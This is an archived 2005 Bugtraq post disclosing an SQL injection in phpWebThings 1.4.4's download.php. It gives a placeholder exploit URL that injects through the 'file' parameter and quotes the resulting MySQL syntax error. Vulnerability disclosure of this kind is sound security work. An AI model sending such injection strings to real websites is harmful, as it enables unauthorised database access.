[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SQL injection in phpWebThing 1.4.4

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQL injection in phpWebThing 1.4.4
From: A.1.M@xxxxxxxxxxx
Date: 11 Nov 2005 11:45:49 -0000

Vulnerable: phpWebThings 1.4.4
website : http://phpwebthings.org

The bug in download.php

ThE Exploit :

http://www.target.com/download.php?file=|SQL


ThE Error:

You have an error in your SQL syntax. Check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'order by date DESC' at 
line 1

AhLaM
http://www.lezr.com/vb
Best Regards ,,,

Prev by Date: High Risk Flaw in RealPlayer
Next by Date: MDKSA-2005:211 - Updated lynx packages fix critical vulnerability
Previous by thread: High Risk Flaw in RealPlayer
Next by thread: MDKSA-2005:211 - Updated lynx packages fix critical vulnerability
Index(es):
- Date
- Thread